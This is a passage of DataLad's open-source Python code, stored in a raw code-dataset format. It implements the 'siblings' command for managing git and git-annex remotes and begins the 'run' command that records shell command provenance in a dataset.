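# 'remove' and 'enable' actions. A minimal Python-API walk-through could
# look like the following; the dataset path, sibling name and URL are
# hypothetical, and an already installed dataset is assumed.
from datalad.distribution.dataset import Dataset

ds = Dataset("/tmp/myds")
# register a new sibling under the name "backup"
ds.siblings(action="add", name="backup",
            url="https://example.org/myds.git")
# report everything known about all siblings, one result record each
for info in ds.siblings(action="query", return_type="generator"):
    print(info["name"], info.get("url", ""))
# --- end of illustrative sketch ---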
For recursive operation it is required that\n a template string for building subdataset sibling URLs\n is given.\\n List of currently available placeholders:\\n\n %%NAME\\tthe name of the dataset, where slashes are replaced by\n dashes.\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n nargs=\"?\"),\n pushurl=Parameter(\n args=('--pushurl',),\n doc=\"\"\"in case the `url` cannot be used to publish to the dataset\n sibling, this option specifies a URL to be used instead.\\nIf no\n `url` is given, `pushurl` serves as `url` as well.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n description=location_description,\n\n ## info options\n # --template/cfgfrom gh-1462 (maybe also for a one-time inherit)\n # --wanted gh-925 (also see below for add_sibling approach)\n\n fetch=Parameter(\n args=(\"--fetch\",),\n action=\"store_true\",\n doc=\"\"\"fetch the sibling after configuration\"\"\"),\n as_common_datasrc=Parameter(\n args=(\"--as-common-datasrc\",),\n metavar='NAME',\n doc=\"\"\"configure a sibling as a common data source of the\n dataset that can be automatically used by all consumers of the\n dataset. The sibling must be a regular Git remote with a\n configured HTTP(S) URL.\"\"\"),\n publish_depends=publish_depends,\n publish_by_default=publish_by_default,\n annex_wanted=annex_wanted_opt,\n annex_required=annex_required_opt,\n annex_group=annex_group_opt,\n annex_groupwanted=annex_groupwanted_opt,\n inherit=inherit_opt,\n get_annex_info=Parameter(\n args=(\"--no-annex-info\",),\n dest='get_annex_info',\n action=\"store_false\",\n doc=\"\"\"Whether to query all information about the annex configurations\n of siblings. Can be disabled if speed is a concern\"\"\"),\n recursive=recursion_flag,\n recursion_limit=recursion_limit)\n\n @staticmethod\n @datasetmethod(name='siblings')\n @eval_results\n def __call__(\n action='query',\n *,\n dataset=None,\n name=None,\n url=None,\n pushurl=None,\n description=None,\n # TODO consider true, for now like add_sibling\n fetch=False,\n as_common_datasrc=None,\n publish_depends=None,\n publish_by_default=None,\n annex_wanted=None,\n annex_required=None,\n annex_group=None,\n annex_groupwanted=None,\n inherit=False,\n get_annex_info=True,\n recursive=False,\n recursion_limit=None):\n\n # TODO: Detect malformed URL and fail?\n # XXX possibly fail if fetch is False and as_common_datasrc\n\n if annex_groupwanted and not annex_group:\n raise InsufficientArgumentsError(\n \"To set groupwanted, you need to provide annex_group option\")\n\n # TODO catch invalid action specified\n action_worker_map = {\n 'query': _query_remotes,\n 'add': _add_remote,\n 'configure': _configure_remote,\n 'remove': _remove_remote,\n 'enable': _enable_remote,\n }\n # all worker strictly operate on a single dataset\n # anything that deals with hierarchies and/or dataset\n # relationships in general should be dealt with in here\n # at the top-level and vice versa\n worker = action_worker_map[action]\n\n ds = require_dataset(\n dataset,\n # it makes no sense to use this command without a dataset\n check_installed=True,\n purpose='configure sibling')\n refds_path = ds.path\n\n res_kwargs = dict(refds=refds_path, logger=lgr)\n\n ds_name = op.basename(ds.path)\n\n # do not form single list of datasets (with recursion results) to\n # give fastest possible response, for the precise of a long-all\n # function call\n\n # minimize expensive calls to .repo\n ds_repo = ds.repo\n\n # prepare common parameterization package for all worker calls\n worker_kwargs = dict(\n name=name,\n fetch=fetch,\n 
description=description,\n as_common_datasrc=as_common_datasrc,\n publish_depends=publish_depends,\n publish_by_default=publish_by_default,\n annex_wanted=annex_wanted,\n annex_required=annex_required,\n annex_group=annex_group,\n annex_groupwanted=annex_groupwanted,\n inherit=inherit,\n get_annex_info=get_annex_info,\n res_kwargs=res_kwargs,\n )\n yield from worker(\n ds=ds,\n repo=ds_repo,\n known_remotes=ds_repo.get_remotes(),\n # for top-level dataset there is no layout questions\n url=_mangle_urls(url, ds_name),\n pushurl=_mangle_urls(pushurl, ds_name),\n **worker_kwargs)\n if not recursive:\n return\n\n # do we have instructions to register siblings with some alternative\n # layout?\n replicate_local_structure = url and \"%NAME\" not in url\n\n subds_pushurl = None\n for subds in ds.subdatasets(\n state='present',\n recursive=recursive, recursion_limit=recursion_limit,\n result_xfm='datasets'):\n subds_repo = subds.repo\n subds_name = op.relpath(subds.path, start=ds.path)\n if replicate_local_structure:\n subds_url = slash_join(url, subds_name)\n if pushurl:\n subds_pushurl = slash_join(pushurl, subds_name)\n else:\n subds_url = \\\n _mangle_urls(url, '/'.join([ds_name, subds_name]))\n subds_pushurl = \\\n _mangle_urls(pushurl, '/'.join([ds_name, subds_name]))\n yield from worker(\n ds=subds,\n repo=subds_repo,\n known_remotes=subds_repo.get_remotes(),\n url=subds_url,\n pushurl=subds_pushurl,\n **worker_kwargs)\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n from datalad.ui import ui\n\n # should we attempt to remove an unknown sibling, complain like Git does\n if res['status'] == 'notneeded' and res['action'] == 'remove-sibling':\n ui.message(\n '{warn}: No sibling \"{name}\" in dataset {path}'.format(\n warn=ac.color_word('Warning', ac.LOG_LEVEL_COLORS['WARNING']),\n **res)\n )\n return\n if res['status'] != 'ok' or not res.get('action', '').endswith('-sibling') :\n generic_result_renderer(res)\n return\n path = op.relpath(res['path'],\n res['refds']) if res.get('refds', None) else res['path']\n got_url = 'url' in res\n spec = '{}{}{}{}'.format(\n res.get('url', ''),\n ' (' if got_url else '',\n res.get('annex-externaltype', 'git'),\n ')' if got_url else '')\n ui.message('{path}: {name}({with_annex}) [{spec}]'.format(\n **dict(\n res,\n path=path,\n # TODO report '+' for special remotes\n with_annex='+' if 'annex-uuid' in res \\\n else ('-' if res.get('annex-ignore', None) else '?'),\n spec=spec)))\n\n\n# always copy signature from above to avoid bugs\ndef _add_remote(ds, repo, name, known_remotes, url, pushurl, as_common_datasrc,\n res_kwargs, **unused_kwargs):\n # TODO: allow for no url if 'inherit' and deduce from the super ds\n # create-sibling already does it -- generalize/use\n # Actually we could even inherit/deduce name from the super by checking\n # which remote it is actively tracking in current branch... 
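# --- Illustrative aside (not part of the original module) ---
# How the "%NAME" placeholder documented above is expanded: _mangle_urls()
# replaces it with the dataset name, slashes turned into dashes, and for
# subdatasets the recursive loop above first joins super- and sub-dataset
# names with "/". The template URL and dataset names below are made up.
def _example_expand_name_template(url_template, ds_name, subds_name=None):
    name = ds_name if subds_name is None else "/".join([ds_name, subds_name])
    return url_template.replace("%NAME", name.replace("/", "-"))

print(_example_expand_name_template("https://example.org/%NAME.git", "study"))
# -> https://example.org/study.git
print(_example_expand_name_template("https://example.org/%NAME.git",
                                    "study", "data/raw"))
# -> https://example.org/study-data-raw.git
# --- end of illustrative aside ---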
but may be\n # would be too much magic\n\n # it seems that the only difference is that `add` should fail if a remote\n # already exists\n if (url is None and pushurl is None):\n raise InsufficientArgumentsError(\n \"\"\"insufficient information to add a sibling\n (needs at least a dataset, and any URL).\"\"\")\n\n # a pushurl should always be able to fill in for a not\n # specified url, however, only when adding new remotes,\n # not when configuring existing remotes (to avoid undesired\n # overwriting of configurations), hence done here only\n if url is None:\n url = pushurl\n\n if not name:\n urlri = RI(url)\n # use the hostname as default remote name\n try:\n name = urlri.hostname\n except AttributeError:\n raise InsufficientArgumentsError(\n \"cannot derive a default remote name from '{}', \"\n \"please specify a name.\".format(url))\n lgr.debug(\n \"No sibling name given, use URL hostname '%s' as sibling name\",\n name)\n\n if not name:\n raise InsufficientArgumentsError(\"no sibling name given\")\n if name in known_remotes:\n yield get_status_dict(\n action='add-sibling',\n status='error',\n path=ds.path,\n type='sibling',\n name=name,\n message=(\"sibling is already known: %s, use `configure` instead?\", name),\n **res_kwargs)\n return\n # XXX this check better be done in configure too\n # see https://github.com/datalad/datalad/issues/5914\n if as_common_datasrc == name:\n raise ValueError('Sibling name ({}) and common data source name ({}) '\n 'can not be identical.'.format(name, as_common_datasrc))\n if isinstance(RI(url), PathRI):\n # make sure any path URL is stored in POSIX conventions for consistency\n # with git's behavior (e.g. origin configured by clone)\n url = Path(url).as_posix()\n # this remote is fresh: make it known\n # just minimalistic name and URL, the rest is coming from `configure`\n repo.add_remote(name, url)\n known_remotes.append(name)\n # always copy signature from above to avoid bugs\n for r in _configure_remote(\n ds=ds, repo=repo, name=name, known_remotes=known_remotes, url=url,\n pushurl=pushurl, as_common_datasrc=as_common_datasrc,\n res_kwargs=res_kwargs, **unused_kwargs):\n if r['action'] == 'configure-sibling':\n r['action'] = 'add-sibling'\n yield r\n\n\ndef _configure_remote(\n ds, repo, name, known_remotes, url, pushurl, fetch, description,\n as_common_datasrc, publish_depends, publish_by_default,\n annex_wanted, annex_required, annex_group, annex_groupwanted,\n inherit, res_kwargs, **unused_kwargs):\n result_props = dict(\n action='configure-sibling',\n path=ds.path,\n type='sibling',\n name=name,\n **res_kwargs)\n if name is None:\n result_props['status'] = 'error'\n result_props['message'] = 'need sibling `name` for configuration'\n yield result_props\n return\n\n if name != 'here':\n # do all configure steps that are not meaningful for the 'here' sibling\n # AKA the local repo\n if name not in known_remotes and url:\n # this remote is fresh: make it known\n # just minimalistic name and URL, the rest is coming from `configure`\n repo.add_remote(name, url)\n known_remotes.append(name)\n elif url:\n # not new, override URl if given\n repo.set_remote_url(name, url)\n\n # make sure we have a configured fetch expression at this point\n fetchvar = 'remote.{}.fetch'.format(name)\n if fetchvar not in repo.config:\n # place default fetch refspec in config\n # same as `git remote add` would have added\n repo.config.add(\n fetchvar,\n '+refs/heads/*:refs/remotes/{}/*'.format(name),\n scope='local')\n\n if pushurl:\n repo.set_remote_url(name, pushurl, 
push=True)\n\n if publish_depends:\n # Check if all `deps` remotes are known to the `repo`\n unknown_deps = set(ensure_list(publish_depends)).difference(\n known_remotes)\n if unknown_deps:\n result_props['status'] = 'error'\n result_props['message'] = (\n 'unknown sibling(s) specified as publication dependency: %s',\n unknown_deps)\n yield result_props\n return\n\n # define config var name for potential publication dependencies\n depvar = 'remote.{}.datalad-publish-depends'.format(name)\n # and default pushes\n dfltvar = \"remote.{}.push\".format(name)\n\n if fetch:\n # fetch the remote so we are up to date\n for r in Update.__call__(\n dataset=ds.path,\n sibling=name,\n merge=False,\n recursive=False,\n on_failure='ignore',\n return_type='generator',\n result_xfm=None):\n # fixup refds\n r.update(res_kwargs)\n yield r\n\n delayed_super = _DelayedSuper(repo)\n if inherit and delayed_super.super is not None:\n # Adjust variables which we should inherit\n publish_depends = _inherit_config_var(\n delayed_super, depvar, publish_depends)\n publish_by_default = _inherit_config_var(\n delayed_super, dfltvar, publish_by_default)\n # Copy relevant annex settings for the sibling\n # makes sense only if current AND super are annexes, so it is\n # kinda a boomer, since then forbids having a super a pure git\n if isinstance(repo, AnnexRepo) and \\\n isinstance(delayed_super.repo, AnnexRepo) and \\\n name in delayed_super.repo.get_remotes():\n if annex_wanted is None:\n annex_wanted = _inherit_annex_var(\n delayed_super, name, 'wanted')\n if annex_required is None:\n annex_required = _inherit_annex_var(\n delayed_super, name, 'required')\n if annex_group is None:\n # I think it might be worth inheritting group regardless what\n # value is\n #if annex_wanted in {'groupwanted', 'standard'}:\n annex_group = _inherit_annex_var(\n delayed_super, name, 'group'\n )\n if annex_wanted == 'groupwanted' and annex_groupwanted is None:\n # we better have a value for the expression for that group\n annex_groupwanted = _inherit_annex_var(\n delayed_super, name, 'groupwanted'\n )\n\n if publish_depends:\n if depvar in ds.config:\n # config vars are incremental, so make sure we start from\n # scratch\n ds.config.unset(depvar, scope='local', reload=False)\n for d in ensure_list(publish_depends):\n lgr.info(\n 'Configure additional publication dependency on \"%s\"',\n d)\n ds.config.add(depvar, d, scope='local', reload=False)\n ds.config.reload()\n\n if publish_by_default:\n if dfltvar in ds.config:\n ds.config.unset(dfltvar, scope='local', reload=False)\n for refspec in ensure_list(publish_by_default):\n lgr.info(\n 'Configure additional default publication refspec \"%s\"',\n refspec)\n ds.config.add(dfltvar, refspec, 'local')\n ds.config.reload()\n\n assert isinstance(repo, GitRepo) # just against silly code\n if isinstance(repo, AnnexRepo):\n # we need to check if added sibling an annex, and try to enable it\n # another part of the fix for #463 and #432\n try:\n exc = None\n if not ds.config.obtain(\n 'remote.{}.annex-ignore'.format(name),\n default=False,\n valtype=EnsureBool(),\n store=False):\n repo.enable_remote(name)\n except (CommandError, DownloadError) as exc:\n # Note: CommandError happens with git-annex\n # 6.20180416+gitg86b18966f-1~ndall+1 (prior 6.20180510, from\n # which starts to fail with AccessFailedError) if URL is bogus,\n # so enableremote fails. E.g. 
as \"tested\" in test_siblings\n # TODO yield\n ce = CapturedException(exc)\n repo.config.reload()\n if repo.is_remote_annex_ignored(name):\n # Only inform user about the failure, if it's actually\n # consequential, because annex decided to set\n # annex-ignore=true.\n lgr.info(\"Could not annex-enable %s: %s\", name, exc.stderr)\n\n if as_common_datasrc:\n # we need a fully configured remote here\n # do not re-use `url`, but ask for the remote config\n # that git-annex will use too\n remote_url = repo.config.get(f'remote.{name}.url')\n ri = RI(remote_url)\n if isinstance(ri, URL) and ri.scheme in ('http', 'https'):\n # XXX what if there is already a special remote\n # of this name? Above check for remotes ignores special\n # remotes. we need to `git annex dead REMOTE` on reconfigure\n # before we can init a new one\n # XXX except it is not enough\n\n # make special remote of type=git (see #335)\n repo.call_annex([\n 'initremote',\n as_common_datasrc,\n 'type=git',\n 'location={}'.format(remote_url),\n 'autoenable=true'])\n else:\n yield dict(\n status='impossible',\n message='cannot configure as a common data source, '\n 'URL protocol is not http or https',\n **result_props)\n #\n # place configure steps that also work for 'here' below\n #\n if isinstance(repo, AnnexRepo):\n for prop, var in (('wanted', annex_wanted),\n ('required', annex_required),\n ('group', annex_group)):\n if var is not None:\n repo.set_preferred_content(prop, var, '.' if name =='here' else name)\n if annex_groupwanted:\n repo.set_groupwanted(annex_group, annex_groupwanted)\n\n if description:\n if not isinstance(repo, AnnexRepo):\n result_props['status'] = 'impossible'\n result_props['message'] = 'cannot set description of a plain Git repository'\n yield result_props\n return\n repo.call_annex(['describe', name, description])\n\n # report all we know at once\n info = list(_query_remotes(ds, repo, name, known_remotes, **unused_kwargs))[0]\n info.update(dict(status='ok', **result_props))\n yield info\n\n\ndef _query_remotes(ds, repo, name, known_remotes, get_annex_info=True,\n res_kwargs=None, **unused_kwargs):\n res_kwargs = res_kwargs or {}\n annex_info = {}\n available_space = None\n want_annex_info = get_annex_info and isinstance(repo, AnnexRepo)\n if want_annex_info:\n # pull repo info from annex\n try:\n # need to do in safety net because of gh-1560\n raw_info = repo.repo_info(fast=True)\n except CommandError:\n raw_info = {}\n available_space = raw_info.get('available local disk space', None)\n for trust in ('trusted', 'semitrusted', 'untrusted'):\n ri = raw_info.get('{} repositories'.format(trust), [])\n for r in ri:\n uuid = r.get('uuid', '00000000-0000-0000-0000-00000000000')\n if uuid.startswith('00000000-0000-0000-0000-00000000000'):\n continue\n ainfo = annex_info.get(uuid, {})\n ainfo['description'] = r.get('description', None)\n annex_info[uuid] = ainfo\n # treat the local repo as any other remote using 'here' as a label\n remotes = [name] if name else ['here'] + known_remotes\n special_remote_info = None\n if want_annex_info:\n # query it once here, and inspect per-remote further down\n special_remote_info = repo.get_special_remotes()\n\n for remote in remotes:\n info = get_status_dict(\n action='query-sibling',\n path=ds.path,\n type='sibling',\n name=remote,\n **res_kwargs)\n if remote != 'here' and remote not in known_remotes:\n info['status'] = 'error'\n info['message'] = 'unknown sibling name'\n yield info\n continue\n # now pull everything we know out of the config\n # simply because it is cheap 
and we don't have to go through\n # tons of API layers to be able to work with it\n if remote == 'here':\n # special case: this repo\n # aim to provide info using the same keys as for remotes\n # (see below)\n for src, dst in (('annex.uuid', 'annex-uuid'),\n ('core.bare', 'annex-bare'),\n ('annex.version', 'annex-version')):\n val = ds.config.get(src, None)\n if val is None:\n continue\n info[dst] = val\n if available_space is not None:\n info['available_local_disk_space'] = available_space\n else:\n # common case: actual remotes\n for remotecfg in [k for k in ds.config.keys()\n if k.startswith('remote.{}.'.format(remote))]:\n info[remotecfg[8 + len(remote):]] = ds.config[remotecfg]\n if get_annex_info and info.get('annex-uuid', None):\n ainfo = annex_info.get(info['annex-uuid'], {})\n annex_description = ainfo.get('description', None)\n if annex_description is not None:\n info['annex-description'] = annex_description\n if want_annex_info:\n if not repo.is_remote_annex_ignored(remote):\n try:\n for prop in ('wanted', 'required', 'group'):\n var = repo.get_preferred_content(\n prop, '.' if remote == 'here' else remote)\n if var:\n info['annex-{}'.format(prop)] = var\n groupwanted = repo.get_groupwanted(remote)\n if groupwanted:\n info['annex-groupwanted'] = groupwanted\n except CommandError as exc:\n if 'cannot determine uuid' in exc.stderr:\n ce = CapturedException(exc)\n repo.config.reload()\n if repo.is_remote_annex_ignored(remote):\n lgr.warning(\n \"%s was marked by git-annex as annex-ignore.\"\n \"Edit .git/config to reset if you think that \"\n \"was done by mistake due to absent \"\n \"connection etc.\",\n remote)\n info['annex-ignore'] = True\n else:\n raise\n else:\n info['annex-ignore'] = True\n\n if special_remote_info:\n # pull out special remote info for this remote, if there is any\n for k, v in special_remote_info.get(\n info.get('annex-uuid'), {}).items():\n info[f'annex-{k}'] = v\n\n info['status'] = 'ok'\n yield info\n\n\ndef _remove_remote(ds, repo, name, res_kwargs, **unused_kwargs):\n if not name:\n # TODO we could do ALL instead, but that sounds dangerous\n raise InsufficientArgumentsError(\"no sibling name given\")\n result_props = dict(\n action='remove-sibling',\n path=ds.path,\n type='sibling',\n name=name,\n **res_kwargs)\n try:\n # failure can happen and is OK\n repo.remove_remote(name)\n except RemoteNotAvailableError as e:\n yield get_status_dict(\n # result-oriented! 
given remote is absent already\n status='notneeded',\n **result_props)\n return\n\n yield get_status_dict(\n status='ok',\n **result_props)\n\n\ndef _enable_remote(ds, repo, name, res_kwargs, **unused_kwargs):\n result_props = dict(\n action='enable-sibling',\n path=ds.path,\n type='sibling',\n name=name,\n **res_kwargs)\n\n if not isinstance(repo, AnnexRepo):\n yield dict(\n result_props,\n status='impossible',\n message='cannot enable sibling of non-annex dataset')\n return\n\n if name is None:\n yield dict(\n result_props,\n status='error',\n message='require `name` of sibling to enable')\n return\n\n # get info on special remote\n sp_remotes = {v['name']: dict(v, uuid=k) for k, v in repo.get_special_remotes().items()}\n remote_info = sp_remotes.get(name, None)\n\n if remote_info is None:\n yield dict(\n result_props,\n status='impossible',\n message=(\"cannot enable sibling '%s', not known\", name))\n return\n\n env = None\n cred = None\n if remote_info.get('type', None) == 'webdav':\n # a webdav special remote -> we need to supply a username and password\n if not ('WEBDAV_USERNAME' in os.environ and 'WEBDAV_PASSWORD' in os.environ):\n # nothing user-supplied\n # let's consult the credential store\n hostname = urlparse(remote_info.get('url', '')).netloc\n if not hostname:\n yield dict(\n result_props,\n status='impossible',\n message=\"cannot determine remote host, credential lookup for webdav access is not possible, and not credentials were supplied\")\n cred = UserPassword('webdav:{}'.format(hostname))\n if not cred.is_known:\n try:\n cred.enter_new(\n instructions=\"Enter credentials for authentication with WEBDAV server at {}\".format(hostname),\n user=os.environ.get('WEBDAV_USERNAME', None),\n password=os.environ.get('WEBDAV_PASSWORD', None))\n except KeyboardInterrupt:\n # user hit Ctrl-C\n yield dict(\n result_props,\n status='impossible',\n message=\"credentials are required for sibling access, abort\")\n return\n creds = cred()\n # update the env with the two necessary variable\n # we need to pass a complete env because of #1776\n env = dict(\n os.environ,\n WEBDAV_USERNAME=creds['user'],\n WEBDAV_PASSWORD=creds['password'])\n\n try:\n repo.enable_remote(name, env=env)\n result_props['status'] = 'ok'\n except AccessDeniedError as e:\n # credentials are wrong, wipe them out\n if cred and cred.is_known:\n cred.delete()\n result_props['status'] = 'error'\n result_props['message'] = str(e)\n except AccessFailedError as e:\n # some kind of connection issue\n result_props['status'] = 'error'\n result_props['message'] = str(e)\n except Exception as e:\n # something unexpected\n raise e\n\n yield result_props\n\n\ndef _inherit_annex_var(ds, remote, cfgvar):\n if cfgvar == 'groupwanted':\n var = getattr(ds.repo, 'get_%s' % cfgvar)(remote)\n else:\n var = ds.repo.get_preferred_content(cfgvar, remote)\n if var:\n lgr.info(\"Inherited annex config from %s %s = %s\",\n ds, cfgvar, var)\n return var\n\n\ndef _inherit_config_var(ds, cfgvar, var):\n if var is None:\n var = ds.config.get(cfgvar)\n if var:\n lgr.info(\n 'Inherited publish_depends from %s: %s',\n ds, var)\n return var\n\n\nclass _DelayedSuper(object):\n \"\"\"A helper to delay deduction on super dataset until needed\n\n But if asked and not found -- would return None for everything\n \"\"\"\n\n def __init__(self, repo):\n self._child_dataset = Dataset(repo.path)\n self._super = None\n self._super_tried = False\n\n def __str__(self):\n return str(self.super)\n\n @property\n def super(self):\n if not self._super_tried:\n 
self._super_tried = True\n # here we must analyze current_ds's super, not the super_ds\n self._super = self._child_dataset.get_superdataset()\n if not self._super:\n lgr.warning(\n \"Cannot determine super dataset for %s, thus \"\n \"probably nothing would be inherited where desired\"\n % self._child_dataset\n )\n return self._super\n\n # Lean proxies going through .super\n @property\n def config(self):\n return self.super.config if self.super else None\n\n @property\n def repo(self):\n return self.super.repo if self.super else None\n" }, { "alpha_fraction": 0.585058867931366, "alphanum_fraction": 0.5862988829612732, "avg_line_length": 37.40161895751953, "blob_id": "8cff958dcb0be578d9cb8b1dd919cf0419681bd0", "content_id": "a2ca86772a5143d094c350d21b28754982b73129", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42741, "license_type": "permissive", "max_line_length": 87, "num_lines": 1113, "path": "/datalad/core/local/run.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Run arbitrary commands and track how they modify a dataset\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport json\nimport logging\nimport os\nimport os.path as op\nimport warnings\nfrom argparse import REMAINDER\nfrom pathlib import Path\nfrom tempfile import mkdtemp\n\nimport datalad\nimport datalad.support.ansi_colors as ac\nfrom datalad.config import anything2bool\nfrom datalad.core.local.save import Save\nfrom datalad.core.local.status import Status\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.distribution.get import Get\nfrom datalad.distribution.install import Install\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n save_message_opt,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.utils import generic_result_renderer\nfrom datalad.local.unlock import Unlock\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError,\n)\nfrom datalad.support.globbedpaths import GlobbedPaths\nfrom datalad.support.json_py import dump2stream\nfrom datalad.support.param import Parameter\nfrom datalad.ui import ui\nfrom datalad.utils import (\n SequenceFormatter,\n chpwd,\n ensure_list,\n ensure_unicode,\n get_dataset_root,\n getpwd,\n join_cmdline,\n quote_cmdlinearg,\n)\n\nlgr = logging.getLogger('datalad.core.local.run')\n\n\ndef _format_cmd_shorty(cmd):\n \"\"\"Get short string representation from a cmd argument list\"\"\"\n cmd_shorty = (join_cmdline(cmd) if isinstance(cmd, list) else cmd)\n cmd_shorty = u'{}{}'.format(\n cmd_shorty[:40],\n '...' 
if len(cmd_shorty) > 40 else '')\n return cmd_shorty\n\n\nassume_ready_opt = Parameter(\n args=(\"--assume-ready\",),\n constraints=EnsureChoice(None, \"inputs\", \"outputs\", \"both\"),\n doc=\"\"\"Assume that inputs do not need to be retrieved and/or outputs do not\n need to unlocked or removed before running the command. This option allows\n you to avoid the expense of these preparation steps if you know that they\n are unnecessary.\"\"\")\n\n\n@build_doc\nclass Run(Interface):\n \"\"\"Run an arbitrary shell command and record its impact on a dataset.\n\n It is recommended to craft the command such that it can run in the root\n directory of the dataset that the command will be recorded in. However,\n as long as the command is executed somewhere underneath the dataset root,\n the exact location will be recorded relative to the dataset root.\n\n If the executed command did not alter the dataset in any way, no record of\n the command execution is made.\n\n If the given command errors, a `CommandError` exception with the same exit\n code will be raised, and no modifications will be saved. A command\n execution will not be attempted, by default, when an error occurred during\n input or output preparation. This default ``stop`` behavior can be\n overridden via [CMD: --on-failure ... CMD][PY: `on_failure=...` PY].\n\n In the presence of subdatasets, the full dataset hierarchy will be checked\n for unsaved changes prior command execution, and changes in any dataset\n will be saved after execution. Any modification of subdatasets is also\n saved in their respective superdatasets to capture a comprehensive record\n of the entire dataset hierarchy state. The associated provenance record is\n duplicated in each modified (sub)dataset, although only being fully\n interpretable and re-executable in the actual top-level superdataset. For\n this reason the provenance record contains the dataset ID of that\n superdataset.\n\n *Command format*\n\n || REFLOW >>\n A few placeholders are supported in the command via Python format\n specification. \"{pwd}\" will be replaced with the full path of the current\n working directory. \"{dspath}\" will be replaced with the full path of the\n dataset that run is invoked on. \"{tmpdir}\" will be replaced with the full\n path of a temporary directory. \"{inputs}\" and \"{outputs}\" represent the\n values specified by [CMD: --input and --output CMD][PY: `inputs` and\n `outputs` PY]. If multiple values are specified, the values will be joined\n by a space. The order of the values will match that order from the command\n line, with any globs expanded in alphabetical order (like bash). Individual\n values can be accessed with an integer index (e.g., \"{inputs[0]}\").\n << REFLOW ||\n\n || REFLOW >>\n Note that the representation of the inputs or outputs in the formatted\n command string depends on whether the command is given as a list of\n arguments or as a string[CMD: (quotes surrounding the command) CMD]. The\n concatenated list of inputs or outputs will be surrounded by quotes when\n the command is given as a list but not when it is given as a string. This\n means that the string form is required if you need to pass each input as a\n separate argument to a preceding script (i.e., write the command as\n \"./script {inputs}\", quotes included). 
The string form should also be used\n if the input or output paths contain spaces or other characters that need\n to be escaped.\n << REFLOW ||\n\n To escape a brace character, double it (i.e., \"{{\" or \"}}\").\n\n Custom placeholders can be added as configuration variables under\n \"datalad.run.substitutions\". As an example:\n\n Add a placeholder \"name\" with the value \"joe\"::\n\n % datalad configuration --scope branch set datalad.run.substitutions.name=joe\n % datalad save -m \"Configure name placeholder\" .datalad/config\n\n Access the new placeholder in a command::\n\n % datalad run \"echo my name is {name} >me\"\n \"\"\"\n _examples_ = [\n dict(text=\"Run an executable script and record the impact on a dataset\",\n code_py=\"run(message='run my script', cmd='code/script.sh')\",\n code_cmd=\"datalad run -m 'run my script' 'code/script.sh'\"),\n dict(text=\"Run a command and specify a directory as a dependency \"\n \"for the run. The contents of the dependency will be retrieved \"\n \"prior to running the script\",\n code_cmd=\"datalad run -m 'run my script' -i 'data/*' \"\n \"'code/script.sh'\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh', message='run my script',\n inputs=['data/*'])\"\"\"),\n dict(text=\"Run an executable script and specify output files of the \"\n \"script to be unlocked prior to running the script\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh', message='run my script',\n inputs=['data/*'], outputs=['output_dir'])\"\"\",\n code_cmd=\"\"\"\\\n datalad run -m 'run my script' -i 'data/*' \\\\\n -o 'output_dir/*' 'code/script.sh'\"\"\"),\n dict(text=\"Specify multiple inputs and outputs\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh',\n message='run my script',\n inputs=['data/*', 'datafile.txt'],\n outputs=['output_dir', 'outfile.txt'])\"\"\",\n code_cmd=\"\"\"\\\n datalad run -m 'run my script' -i 'data/*' \\\\\n -i 'datafile.txt' -o 'output_dir/*' -o \\\\\n 'outfile.txt' 'code/script.sh'\"\"\"),\n dict(text=\"Use ** to match any file at any directory depth recursively. \"\n \"Single * does not check files within matched directories.\",\n code_py=\"\"\"\\\n run(cmd='code/script.sh',\n message='run my script',\n inputs=['data/**/*.dat'],\n outputs=['output_dir/**'])\"\"\",\n code_cmd=\"\"\"\\\n datalad run -m 'run my script' -i 'data/**/*.dat' \\\\\n -o 'output_dir/**' 'code/script.sh'\"\"\")\n ]\n\n result_renderer = \"tailored\"\n # make run stop immediately on non-success results.\n # this prevents command execution after failure to obtain inputs of prepare\n # outputs. but it can be overriding via the common 'on_failure' parameter\n # if needed.\n on_failure = 'stop'\n\n _params_ = dict(\n cmd=Parameter(\n args=(\"cmd\",),\n nargs=REMAINDER,\n metavar='COMMAND',\n doc=\"\"\"command for execution. A leading '--' can be used to\n disambiguate this command from the preceding options to\n DataLad.\"\"\"),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to record the command results in.\n An attempt is made to identify the dataset based on the current\n working directory. If a dataset is given, the command will be\n executed in the root directory of this dataset.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n inputs=Parameter(\n args=(\"-i\", \"--input\"),\n dest=\"inputs\",\n metavar=(\"PATH\"),\n action='append',\n doc=\"\"\"A dependency for the run. Before running the command, the\n content for this relative path will be retrieved. A value of \".\" means \"run\n :command:`datalad get .`\". 
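# --- Illustrative aside (not datalad code) ---
# The "**" vs "*" matching described in the examples above behaves like
# Python's own recursive globbing: "**" crosses directory levels, a single
# "*" stays within one level. The directory and file names here are made up.
import glob

print(glob.glob("data/**/*.dat", recursive=True))  # matches at any depth
print(glob.glob("data/*.dat"))                     # top level of data/ only
# --- end of illustrative aside ---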
